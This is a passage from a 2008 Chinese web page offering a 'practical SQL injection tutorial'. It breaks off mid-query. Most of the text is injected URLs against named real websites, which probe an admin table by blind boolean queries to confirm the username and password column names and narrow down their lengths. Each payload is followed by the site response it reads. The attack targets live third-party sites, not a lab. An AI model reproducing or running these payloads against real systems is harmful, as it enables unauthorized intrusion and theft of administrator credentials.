WEB开发网
开发学院网络安全黑客技术 给大家发一个SQL注入实战教程吧 阅读

给大家发一个SQL注入实战教程吧

 2008-10-27 16:51:38 来源:WEB开发网   
核心提示: 没有返回错误信息.又也没有返回文章,提示找不到相应文章证明:在admin中存在username这个字段.只是用户名不是qqq猜密码的字段名http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admi

没有返回错误信息.又也没有返回文章,提示找不到相应文章

证明:在admin中存在username这个字段.

只是用户名不是qqq

猜密码的字段名

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where passwd='qqq')

返回错误信息,表示没有passwd这个密码字段名

再来~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

password='qqq')

没有返回错误信息.也没有返回文章.提示找不到相应文章.

证明:在admin中存在password这个字段.

只是密码不是qqq

现在就来猜用户字段名长度

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

len(username)>8)

正确~~

http://www.xuanke.com/wz/list.asp?id=47 and 1=(select min(id) from admin where len(username)<15)

正确~~

用户名长度 大于8 小于15

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

len(username)=10)

呵呵~~用户名长度为10位``~~

猜密码长度

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

len(password)>8)

正确~~

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

len(password)<15)

正确~~~

密码长度也是 大于8 小于15

http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where

Tags:大家 一个 SQL

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接